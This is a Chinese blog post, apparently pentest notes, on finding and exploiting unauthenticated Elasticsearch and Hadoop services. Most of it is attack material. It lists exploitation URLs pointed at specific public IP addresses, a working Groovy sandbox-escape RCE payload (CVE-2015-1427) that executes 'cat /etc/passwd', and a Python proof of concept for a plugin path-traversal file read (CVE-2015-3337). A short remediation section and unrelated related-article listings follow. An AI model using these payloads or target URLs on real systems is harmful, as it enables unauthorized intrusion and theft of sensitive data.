逝之君
逝之君

ElasticSearch未授权访问的检测与利用思路

基本说明

VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html

延伸阅读

https://www.ichunqiu.com/course/1413

Redis未授权访问
其他 NoSQL未授权访问
MongoDB、Redis、ES、Memcached、Hadoop

漏洞描述

ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放9200端口,可被非法操作数据。

漏洞检测

默认端口 9200 HTTP协议
返回内容中包含”You Know, for Search”

(另外,AWVS也可发现)

一般来说,出现这种问题的多数是默认配置的ElasticSearch
(粗检只考虑9200,如果是作为甲方那还是要所有端口过一遍)
所以只要检测9200就好了,如果端口不在9200,通常说明运维、开发者可能已经在考虑一些安全性问题,也就没必要深究了。

一些利用的URL

节点URL

 
       

         1 
       
 
       

         2 
       
 
       

         3 
       
 
       

         4 
       
 
       

         5 
       
 
       

         6 
       
 
       

         7 
       
 
       

         8 
       
 		 
       
 
       
 
        http: 
        //101.198.161.130:9200/_cat/indices/ 
       
 
       
 
        http: 
        //101.198.161.130:9200/_plugin/head/ 
       
 
       
 
        http: 
        //101.198.161.130:9200/_nodes 
       
 
       
 
        http: 
        //101.198.161.130:9200/_nodes?prettify 
       
 
       
 
        http: 
        //101.198.161.130:9200/_status 
       
 
       
 
        http: 
        //101.198.161.130:9200/_search?pretty 
       
 
       
 
        http: 
        //10.203.9.131:9200/zjftu/ 
       
 
       
 
        http: 
        //10.203.9.131:9200/zjftu/_search?pretty 
       
 		 
     
 
     
   
 
   
 
   
Hadoop未授权访问
 
   
 
     
     
 
       
 
       

         1 
       
 
       

         2 
       
 		 
       
 
       
 
        http: 
        //103.15.200.81:50070/dfshealth.jsp 
       
 
       
 
        http: 
        //103.15.200.81:50070/logs/ 
       
 		 
     
 
     
   
 
   
 
   
 漏洞危害
 
   
可被非法操作数据,对网站数据造成影响。
 
   
 修复方案
 
   
1.关闭9200端口
 2.防火墙上设置禁止外网访问此端口。
 
   
 历史事件漏洞
 
   
安全脉搏搜索
 乌云镜像搜索
 CNVD搜索
 
   
1 360手机一处Elasticsearch未授权访问 (2016-04-19)
https://www.secpulse.com/archives/46394.html
 
   
2 暴风某站Elasticsearch未授权访问&Hadoop未授权访问(2016-04-27)
https://www.secpulse.com/archives/49115.html
 
   
3 新华网某频道服务器一处Elasticsearch配置不当/可任意操作/涉及被采访人员信息(2016-03-19)
https://www.secpulse.com/archives/46976.html
 
   
(ElasticSearch RCE)
 4 神器而已证券系列之九州证券某站Elasticsearch远程代码执行漏洞(2015-09-11 18:30)
 (内含少量内网套路)
https://www.secpulse.com/archives/39822.html
 
   
5 风行某站Elasticsearch配置不当(任意文件读取)
https://www.secpulse.com/archives/41126.html
 
   
6 上海某服务器一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(790多W用户姓名\身份证号\民族\开房时间\退房时间\房间号等)(2016-03-16)
https://www.secpulse.com/archives/46801.html
 
   
7 广西移动一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(用户手机号码/IMEI/IMSI/上网时间/地点等)
https://www.secpulse.com/archives/46798.html
 
   
 ElasticSearch Groovy RCE (CVE-2015-1427)
 
   
影响范围
 The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
 
   
对一下链接进行一个POST
 
   
http://127.0.0.1:9200/_search?pretty
 
   
POST的data域如下
 
   
 
     
     
 
       
 
       

         1 
       
 		 
       
 
       

         { 
        "size": 
        1, 
        "script_fields": { 
        "iswin": { 
        "script": 
        "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()", 
        "lang": 
        "groovy"}}} 
       
 		 
     
 
     
   
 
   
 
   
几个其他Exp
 
   
https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761
 
   
es_poc_1.py
 
   
 
     
     
 
       
 
       

         1 
       
 
       

         2 
       
 
       

         3 
       
 
       

         4 
       
 
       

         5 
       
 
       

         6 
       
 
       

         7 
       
 
       

         8 
       
 
       

         9 
       
 
       

         10 
       
 
       

         11 
       
 
       

         12 
       
 
       

         13 
       
 
       

         14 
       
 
       

         15 
       
 
       

         16 
       
 
       

         17 
       
 
       

         18 
       
 
       

         19 
       
 
       

         20 
       
 
       

         21 
       
 
       

         22 
       
 
       

         23 
       
 
       

         24 
       
 
       

         25 
       
 		 
       
 
       

         #!/usr/bin/env python 
       
 
       

         #-*- coding:utf- 
        8 -*- 
       
 
       
 
       

         import requests 
       
 
       
 
       

         host= 
        "10.203.9.131" 
       
 
       

         port = 
        9200 
       
 
       
 
       

         def elastic_directoryTraversal(host,port): 
       
 
       

         pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] 
       
 
       

         pList = ['/../../../../../../../../../../../../../../etc/passwd','/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/etc/passwd','/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/ 
        %c0 
        %ae 
        %c0 
        %ae/windows/win.ini'] 
       
 
       
 
        for p in pluginList: 
       
 
       
 
        for path in pList: 
       
 
       

         urlA = 
        "http://%s:%d/_plugin/%s%s" % (host,port,p,path) 
       
 
       
 
        try: 
       
 
       

         content = requests.get(urlA,timeout= 
        5,allow_redirects=True,verify=False).content 
       
 
       
 
        print content 
       
 
       
 
        print 
        "\n-------------------------------------------------------------\n" 
       
 
       
 
       
 
        if 
        "/root:/" in content: 
       
 
       
 
        print 'Elasticsearch 任意文件读取漏洞(CVE- 
        2015- 
        3337) Found!' 
       
 
       

         except Exception,e: 
       
 
       
 
        print e 
       
 
       
 
       

         elastic_directoryTraversal(host,port) 
       
 		 
     
 
     
   
 
   
 
  
 
  
 
  
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(渗透测试)

        

            

                
    
                    
  • 网络安全难学吗?学网络安全的好处是什么?
                        网络安全(king)
网络安全网络工程师黑客web安全网络安全
                        
    在这个高度依赖于网络的时代,网络安全已经成为我们工作和生活中不可或缺的一部分,更是0基础转行IT的首选,可谓是前景好、需求大,在企业当中也属于双高职位,地位高、薪资高,而且入门门槛低,那么网络安全难学吗?学网络安全的好处是什么?以下是详细内容介绍。网络安全难学吗?学习网络安全需要循序渐进,由浅入深。其实网络安全本身的知识并不是很难,但是需要学习的内容有很多,比如包括Linux、数据库、渗透测试、等
    
                    
    • 
                    
  • python hack库_这里有123个黑客必备的Python工具!
                        weixin_39637571
pythonhack库
                        
    123个Python渗透测试工具,当然不仅于渗透~如果你想参与漏洞研究、逆向工程和渗透,我建议你时候用Python语言。Python已经有很多完善可用的库,我将在这里把他们列出来。这个清单里的工具大部分都是Python写成的,一部分是现有C库的Python绑定,这些库在Python中都可以简单使用。一些强力工具(pentestframeworks、bluetoothsmashers、webappl
    
                    
    • 
                    
  • 红蓝对抗之Windows内网渗透实战
                        wespten
网络安全AI+渗透测试代码审计等保全栈网络安全开发windows
                        
    无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进入内网,然后发起内网渗透。而国内外红蓝对抗服务和开源攻击工具大多数以攻击Windows域为主,主要原因是域控拥有上帝能力,可以控制域内所有员工电脑,进而利用员工的合法权限获取目标权限和数据,达成渗透目的。以蓝军攻击
    
                    
    • 
                    
  • 202年充电计划——自学手册 网络安全(黑客技术)
                        网安康sir
web安全安全网络pythonlinux
                        
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-安恒 (题目+回答)
                        独行soc
2025年渗透测试面试指南面试职场和发展安全web安全红蓝攻防
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录安恒1.sqlmap爆出当前数据库库名的参数是什么?2.nmap探测系统类型的参数是?3.nmap的小写-o和-A是做啥的?4.布尔盲注的具体语句是啥?5.宽字节原理6.Python是否存在反序列化漏洞?7.GET与POST传参的区别8.HTTP请求方式9.如何判断C
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-阿里巴巴-阿里云安全(二面)(题目+回答)
                        独行soc
2025年渗透测试面试指南科技安全web安全面试职场和发展红蓝攻防阿里云
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录阿里巴巴-阿里云安全二面一、职业方向与技术偏好1.安全研究vs安全研发的定位二、云安全与身份认证2.云上PKI与身份认证的关注方向三、项目实践与成果3.字节跳动训练营项目四、攻防技术深度解析4.SQL注入攻防方案5.WAF防护原理五、团队协作与效能优化6.分工协作与个
    
                    
    • 
                    
  • 【网络安全 | 渗透工具-目录FUZZ】ffuf安装使用详细教程
                        秋说
网安渗透工具使用教程(全)web安全ffuf渗透工具漏洞挖掘
                        
    原创文章,不得转载。文章目录ffuf安装使用Wordlist工作模式配置请求的方式匹配和过滤选项显示和保存输出结果ffufffuf(FuzzFasterUFool)是一个开源的命令行工具,用于进行网络应用程序的目录和文件枚举,特别是在渗透测试和安全研究中。它能够通过对目标应用程序发起大量的请求,迅速识别出隐藏的资源和目录。工具特点:高速性能:ffuf的设计目的是提供高速度的模糊测试,通过多线程和异
    
                    
    • 
                    
  • 零基础转行学网络安全怎么样?能找到什么样的工作?
                        网络安全苏柒
web安全安全计算机网络网络安全转行黑客工作
                        
    网络安全对于现代社会来说变得越来越重要,但是很多人对于网络安全的知识却知之甚少。那么,零基础小白可以学网络安全吗?答案是肯定的。零基础转行学习网络安全是完全可行的,但需要明确的是,网络安全是一个既广泛又深入的领域,包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域,对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安
    
                    
    • 
                    
  • 每周一个网络安全相关工具——MetaSpLoit
                        w2361734601
web安全安全msf6MetaSpLoit
                        
    一、Metasploit简介Metasploit(MSF)是一款开源渗透测试框架,集成了漏洞利用、Payload生成、后渗透模块等功能,支持多种操作系统和硬件平台。其模块化设计(如exploits、auxiliary、payloads等)使其成为全球最受欢迎的渗透测试工具之一二、安装与更新KaliLinux默认集成Kali系统自带Metasploit,通过命令msfconsole启动。若需手动安装
    
                    
    • 
                    
  • 渗透测试环境搭建,包含常用命令(Android&IOS)
                        程序员的世界你不懂
Android性能专项Android自动化系列ios
                        
    硬件环境Android设备(需root)(虚拟机也可以)iOS设备(需越狱)网络环境没有特别要求操作系统环境Mac+Xcode操作环境Linux或Unix环境Android软件环境android开发环境AndroidSDKJDKEclipse网络分析工具burpsuite免费版charleswireshark对于自定义协议,虚拟设备只能异步抓取数据包逆向分析工具baksmali/smaliapkt
    
                    
    • 
                    
  • 自学网络安全(黑客技术)2025年 —90天学习计划
                        网安CILLE
web安全学习安全网络网络安全linuxpython
                        
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-长某亭科技-安全服务工程师(一面)(题目+回答)
                        独行soc
2025年渗透测试面试指南面试职场和发展安全红蓝攻防护网2025科技
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录长某亭科技-安全服务工程师(一面)1.SQL注入原理与代码层面成因原理代码层面成因漏洞触发场景2.XSS漏洞原理(代码层面)原理代码层面成因漏洞触发场景3.OWASPTop10漏洞(2023版)4.SQL注入防御方案5.SQL注入绕过防护6.护网行动工作内容7.学校攻
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-快某手-安全实习生(一面、二面)(题目+回答)
                        独行soc
2025年渗透测试面试指南安全科技网络面试护网2015年
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录快某手-安全实习生一面一、Linux操作:查看进程PID的5种方法二、Elasticsearch(ES)核心要点三、HTTPS建立过程(TLS1.3优化版)四、Python内存管理机制五、深拷贝与浅拷贝对比六、Python多线程局限性七、XSS防御方案八、SQL注入防
    
                    
    • 
                    
  • 1433抓鸡工具_1433抓鸡工具在软件安全测试中的重要性及应用
                        网络安全(king)
网络工程师网络安全黑客web安全网络安全前端服务器
                        
    在信息安全领域,“1433抓鸡工具”这一术语往往与网络安全测试紧密相关。虽然名字听起来有些戏谑,但这类工具在软件安全评估和渗透测试中扮演着重要角色。本文将从软考的角度出发,探讨1433抓鸡工具的基本概念、使用场景及其在软件安全中的作用。一、1433抓鸡工具概述1433抓鸡工具,通常指的是一类网络安全测试工具,用于检测网络系统中的潜在漏洞。这类工具能够模拟黑客的攻击行为,帮助安全专家发现系统可能存在
    
                    
    • 
                    
  • 信息安全技术——渗透攻击
                        降江酱姜
安全web安全网络
                        
    一、渗透攻击的介绍1.1渗透攻击是什么意思1.2渗透攻击的特点1.3渗透攻击的阶段二、渗透攻击的常用方法有哪些2.1获取口令入侵。2.2远程控制入侵2.3.木马入侵2.4电子邮件入侵2.5网络监听入侵2.6SQL注入攻击三、操作演示一、渗透攻击的介绍1.1渗透攻击是什么意思渗透攻击(Penetration,也称“渗透测试”)是一种在授权的情况下,使用技术攻击、破解、测试和安全评估网络系统的安全控制
    
                    
    • 
                    
  • kali安装教程(超全)
                        撒旦骑路西法,大战吕布
linux服务器运维
                        
    KaliLinux是一款基于Debian的Linux发行版,专注于渗透测试和安全审计。以下是在计算机上安装KaliLinux的步骤:1.下载KaliLinux的ISO镜像文件。你可以从官方网站(https://www.kali.org/downloads/)或者其他可靠的镜像站点下载。2.创建一个可启动的USB设备。你可以使用Rufus(https://rufus.ie/)或Etcher(http
    
                    
    • 
                    
  • 渗透测试之利用sql拿shell(附完整流程+防御方案)【下】
                        豪门土狗
渗透测试数据库网络安全笔记sql
                        
    导读:时刻保持谦逊,始终保持学习,探寻事物的本质,不要把事情复杂化话不多说,书接上回三、利用日志getshell利用条件:拥有网站的写入权限知道网站的绝对路径数据库日志开启实际操作:(1)查看数据库日志是否开启以及路径showvariableslike'%general%';(2)开启日志功能修改general_log的值为ONsetglobalgeneral_log="ON";修改文件路径;注意
    
                    
    • 
                    
  • Web网站漏洞扫描与渗透攻击
                        嗨起飞了
网络安全网络安全web安全
                        
    Web网站漏洞扫描与渗透攻击工具全解析:从防御者到攻击者的双重视角网络安全是永无止境的攻防博弈前言:数字世界的攻守之道在数字化转型的浪潮中,Web应用已成为网络攻击的主要目标。根据CybersecurityVentures的统计,2023年全球因网络攻击导致的经济损失预计突破8万亿美元。作为开发者或安全工程师,了解常见漏洞扫描工具和渗透测试技术已成为必备技能。本文将从防御和攻击双重视角,深入剖析主
    
                    
    • 
                    
  • 黑客入门手册
                        嗨起飞了
网络安全网络攻击模型网络安全
                        
    零基础入门网络安全:黑客技术学习路线与实战手册摘要:本文面向网络安全初学者,系统化拆解黑客技术学习路径,涵盖基础理论、实战工具和代码实例。内容遵循合法合规原则,仅用于技术研究。一、黑客技术学习的认知前提1.1什么是真正的"黑客"黑客精神的核心:探索系统原理与漏洞本质白帽/灰帽/黑帽的伦理边界(以《网络安全法》为准则)1.2学习前的法律警示渗透测试授权原则虚拟机实验环境搭建的重要性推荐工具:VMwa
    
                    
    • 
                    
  • Metasploit SQL注入漏洞渗透测试实战
                        wespten
网络安全AI+渗透测试代码审计等保全栈网络安全开发sql安全web安全
                        
    1、SQL注入漏洞简介现代化Web应用程序在设计时都会将代码与数据进行分离,这些数据会独立保存在服务器中。当数据量较大的时候,需要使用一种特殊的数据管理程序,也就是常说的数据库。目前比较常用的数据库软件有MySQL、SQLServer、Access等,不过它们的操作都要遵循SQL(StructuredQueryLanguage,结构化查询语言)标准,但是不同的产品之间存在着一定的差别。SQL注入攻
    
                    
    • 
                    
  • 202年充电计划——自学手册 网络安全(黑客技术)
                        网安康sir
web安全安全网络pythonlinux
                        
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
    
                    
    • 
                    
  • 2025HW行动面试题20道全解析(附答案)黑客技术零基础入门到精通实战教程!
                        程序员七海
web安全网络安全干货分享计算机渗透测试护网行动黑客技术
                        
    HW行动作为国家级网络安全攻防演练的重要环节,对安全工程师的技术能力和实战经验提出了极高要求。本文结合近年护网面试高频考点与实战经验,整理出20道面试题及详细解析,涵盖渗透测试、漏洞分析、防御技术、应急响应等方向,助力从业者系统备战。一、基础概念与攻防技术什么是DDoS攻击?如何防御?答:DDoS攻击通过向目标发送海量请求耗尽资源,导致服务瘫痪。防御需结合流量清洗(CDN)、负载均衡、IPS/ID
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-字某跳动-安全研究实习生(三面)(题目+回答)
                        独行soc
2025年渗透测试面试指南面试职场和发展web安全安全linux服务器
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录字某跳动-安全研究实习生(三面)一、攻防演练经典案例分析二、CSRF漏洞修复方案三、Java代码审计流程四、SQL注入防御体系五、域名访问技术解析六、登录页安全风险七、安全工具开发实践字某跳动-安全研究实习生(三面)聊聊攻防演练中比较得意,印象深刻的一次经历CSRF漏
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-腾某讯-技术安全实习生(题目+回答)
                        独行soc
2025年渗透测试面试指南安全面试护网网络2015年
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录腾讯-技术安全实习生一、SQL二次注入原理与修复二、SQL注入过滤information的绕过方法三、Redis未授权访问漏洞四、渗透测试标准化流程mermaid五、CTF经典题型案例六、文件下载漏洞利用七、HTTP不出网的命令执行漏洞处理八、隧道通信技术细节(以DN
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-字某某动-安全研究实习生(二面)(题目+回答)
                        独行soc
2025年渗透测试面试指南面试职场和发展安全网络安全红蓝攻防护网
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录字某某动-安全研究实习生(二面)1.护网行动中的核心工作2.防护层级选择(WAF/IDS)3.误报治理方案4.内网误报分布场景5.MySQL执行PowerShell防护6.资产收集经验7.漏洞攻击案例8.SQL注入攻防详解原理防御方案OrderBy防御特殊字符处理9.
    
                    
    • 
                    
  • 小白必看!2025 网络安全保姆级学习路线来啦~
                        白帽黑客-晨哥
学习web安全安全数据库php
                        
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路首先咱们聊聊,学习网络安全方向通常会有哪些问题1.初学者常见问题1.1如何开始学习网络安全?问题:网络安全领域广泛,初学者往往不知道从哪里入手。解答:从基础知识开始:学习计算机网络、操作系统、编程语言(如Python、Bash)。了解网络安全的基本概念,如加密、认证、漏洞、攻击类型等。使用在线资源(如Cybrary、OWASP)或书籍
    
                    
    • 
                    
  • 如何避免忽略安全、性能等非功能性需求
                        
需求管理
                        
    在现代软件项目中,安全要求、性能监控、规范测试是保障产品质量的关键要素,其中安全要求尤为重要,它直接影响用户数据保护与系统稳定性。确保安全需求不仅仅是配置防火墙和加密技术,更需要从设计阶段就嵌入安全策略,通过持续监控和定期评估及时发现隐患,并借助行业标准与工具进行系统加固,如定期渗透测试与安全漏洞修复等措施。以下内容将从多个维度详细阐述如何避免忽略安全、性能等非功能性需求,以专业经验和权威数据为依
    
                    
    • 
                    
  • 2020年“磐云杯”网络空间安全技能竞赛全国拉赛
                        Beluga
中职网络空间安全赛题安全linux网络网络空间安全中科磐云
                        
    2020年“磐云杯”网络空间安全技能竞赛全国拉赛一、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段单兵模式系统渗透测试任务1Wireshark数据包分析100分钟100任务2系统漏洞扫描与利用100任务3服务漏洞扫描于测试100任务4Web渗透测试100任务5Windows操作系统渗透测试100任务6Linux操作系统渗透测试100任务7主机存活扫描渗透测试100备战阶段攻防对抗准备工作20
    
                    
    • 
                    
  • Web安全攻防入门教程——hvv行动详解
                        白帽子黑客罗哥
web安全安全网络安全系统安全红蓝对抗
                        
    Web安全攻防入门教程Web安全攻防是指在Web应用程序的开发、部署和运行过程中,保护Web应用免受攻击和恶意行为的技术与策略。这个领域不仅涉及防御措施的实现,还包括通过渗透测试、漏洞挖掘和模拟攻击来识别潜在的安全问题。本教程将带你入门Web安全攻防的基础概念、常见攻击类型、防御技术以及一些实战方法。一、Web安全基础Web应用安全的三大核心目标(CIA三原则)机密性(Confidentialit
    
                    
    • 
                    
  • Web安全攻防入门教程——hvv行动详解
                        白帽子黑客罗哥
web安全安全网络安全系统安全红蓝对抗
                        
    Web安全攻防入门教程Web安全攻防是指在Web应用程序的开发、部署和运行过程中,保护Web应用免受攻击和恶意行为的技术与策略。这个领域不仅涉及防御措施的实现,还包括通过渗透测试、漏洞挖掘和模拟攻击来识别潜在的安全问题。本教程将带你入门Web安全攻防的基础概念、常见攻击类型、防御技术以及一些实战方法。一、Web安全基础Web应用安全的三大核心目标(CIA三原则)机密性(Confidentialit
    
                    
    • 
                                
  • iOS http封装
                                    374016526
ios服务器交互http网络请求
                                    
    程序开发避免不了与服务器的交互,这里打包了一个自己写的http交互库。希望可以帮到大家。 
  
内置一个basehttp,当我们创建自己的service可以继承实现。 
  
KuroAppBaseHttp *baseHttp = [[KuroAppBaseHttp alloc] init]; 
[baseHttp setDelegate:self]; 
[baseHttp 
    
                                
    • 
                                
  • lolcat :一个在 Linux 终端中输出彩虹特效的命令行工具
                                    brotherlamp
linuxlinux教程linux视频linux自学linux资料
                                    
      
那些相信 Linux 命令行是单调无聊且没有任何乐趣的人们,你们错了,这里有一些有关 Linux 的文章,它们展示着 Linux 是如何的有趣和“淘气” 。 
在本文中,我将讨论一个名为“lolcat”的小工具 – 它可以在终端中生成彩虹般的颜色。 
何为 lolcat ? 
Lolcat 是一个针对 Linux,BSD 和 OSX 平台的工具,它类似于 cat 命令,并为 cat
    
                                
    • 
                                
  • MongoDB索引管理(1)——[九]
                                    eksliang
mongodbMongoDB管理索引
                                    
    转载请出自出处:http://eksliang.iteye.com/blog/2178427 一、概述 
      数据库的索引与书籍的索引类似,有了索引就不需要翻转整本书。数据库的索引跟这个原理一样,首先在索引中找,在索引中找到条目以后,就可以直接跳转到目标文档的位置,从而使查询速度提高几个数据量级。 
      不使用索引的查询称
    
                                
    • 
                                
  • Informatica参数及变量
                                    18289753290
Informatica参数变量
                                    
    下面是本人通俗的理解,如有不对之处,希望指正 info参数的设置:在info中用到的参数都在server的专门的配置文件中(最好以parma)结尾 下面的GLOBAl就是全局的,$开头的是系统级变量,$$开头的变量是自定义变量。如果是在session中或者mapping中用到的变量就是局部变量,那就把global换成对应的session或者mapping名字。 
 
 
[GLOBAL] $Par
    
                                
    • 
                                
  • python 解析unicode字符串为utf8编码字符串
                                    酷的飞上天空
unicode
                                    
    php返回的json字符串如果包含中文,则会被转换成\uxx格式的unicode编码字符串返回。 
在浏览器中能正常识别这种编码,但是后台程序却不能识别,直接输出显示的是\uxx的字符,并未进行转码。 
  
转换方式如下 
  
  
>>> import json
>>> q = '{"text":"\u4
    
                                
    • 
                                
  • Hibernate的总结
                                    永夜-极光
Hibernate
                                    
    1.hibernate的作用,简化对数据库的编码,使开发人员不必再与复杂的sql语句打交道 
  
做项目大部分都需要用JAVA来链接数据库,比如你要做一个会员注册的 页面,那么 获取到用户填写的 基本信后,你要把这些基本信息存入数据库对应的表中,不用hibernate还有mybatis之类的框架,都不用的话就得用JDBC,也就是JAVA自己的,用这个东西你要写很多的代码,比如保存注册信
    
                                
    • 
                                
  • SyntaxError: Non-UTF-8 code starting with '\xc4'
                                    随便小屋
python
                                    
    刚开始看一下Python语言,传说听强大的,但我感觉还是没Java强吧! 
写Hello World的时候就遇到一个问题,在Eclipse中写的,代码如下 
'''
Created on 2014年10月27日

@author: Logic
'''
print("Hello World!"); 
 运行结果 
SyntaxError: Non-UTF-8 
    
                                
    • 
                                
  • 学会敬酒礼仪 不做酒席菜鸟
                                    aijuans
菜鸟
                                    
    俗话说,酒是越喝越厚,但在酒桌上也有很多学问讲究,以下总结了一些酒桌上的你不得不注意的小细节。 
 细节一:领导相互喝完才轮到自己敬酒。敬酒一定要站起来,双手举杯。  
 细节二:可以多人敬一人,决不可一人敬多人,除非你是领导。  
 细节三:自己敬别人,如果不碰杯,自己喝多少可视乎情况而定,比如对方酒量,对方喝酒态度,切不可比对方喝得少,要知道是自己敬人。  
 细节四:自己敬别人,如果碰杯,一
    
                                
    • 
                                
  • 《创新者的基因》读书笔记
                                    aoyouzi
读书笔记《创新者的基因》
                                    
    创新者的基因 
  
创新者的“基因”,即最具创意的企业家具备的五种“发现技能”:联想,观察,实验,发问,建立人脉。 
  
第一部分破坏性创新,从你开始 
第一章破坏性创新者的基因 
如何获得启示: 
发现以下的因素起到了催化剂的作用:(1) -个挑战现状的问题;(2)对某项技术、某个公司或顾客的观察;(3) -次尝试新鲜事物的经验或实验;(4)与某人进行了一次交谈,为他点醒
    
                                
    • 
                                
  • 表单验证技术
                                    百合不是茶
JavaScriptDOM对象String对象事件
                                    
    js最主要的功能就是验证表单,下面是我对表单验证的一些理解,贴出来与大家交流交流  ,数显我们要知道表单验证需要的技术点, String对象,事件,函数 
  
一:String对象;通常是对字符串的操作; 
  
1,String的属性; 
  
    字符串.length;表示该字符串的长度;
   var str= "java"
    
                                
    • 
                                
  • web.xml配置详解之context-param
                                    bijian1013
javaservletweb.xmlcontext-param
                                    
    一.格式定义: 
<context-param>  
	<param-name>contextConfigLocation</param-name>  
	<param-value>contextConfigLocationValue></param-value>  
</context-param> 
作用:该元
    
                                
    • 
                                
  • Web系统常见编码漏洞(开发工程师知晓)
                                    Bill_chen
sqlPHPWebfckeditor脚本
                                    
    1.头号大敌:SQL Injection 
原因:程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果, 
获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 
本质: 
对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。 
示例: 
String query = "SELECT id FROM users
    
                                
    • 
                                
  • 【MongoDB学习笔记六】MongoDB修改器
                                    bit1129
mongodb
                                    
    本文首先介绍下MongoDB的基本的增删改查操作,然后,详细介绍MongoDB提供的修改器,以完成各种各样的文档更新操作    MongoDB的主要操作 
 
 show dbs 显示当前用户能看到哪些数据库 
 use foobar 将数据库切换到foobar 
 show collections 显示当前数据库有哪些集合 
 db.people.update,update不带参数,可
    
                                
    • 
                                
  • 提高职业素养,做好人生规划
                                    白糖_
人生
                                    
      
培训讲师是成都著名的企业培训讲师,他在讲课中提出的一些观点很新颖,在此我收录了一些分享一下。注:讲师的观点不代表本人的观点,这些东西大家自己揣摩。 
  
1、什么是职业规划:职业规划并不完全代表你到什么阶段要当什么官要拿多少钱,这些都只是梦想。职业规划是清楚的认识自己现在缺什么,这个阶段该学习什么,下个阶段缺什么,又应该怎么去规划学习,这样才算是规划。 
  
    
                                
    • 
                                
  • 国外的网站你都到哪边看?
                                    bozch
技术网站国外
                                    
    学习软件开发技术,如果没有什么英文基础,最好还是看国内的一些技术网站,例如:开源OSchina,csdn,iteye,51cto等等。 
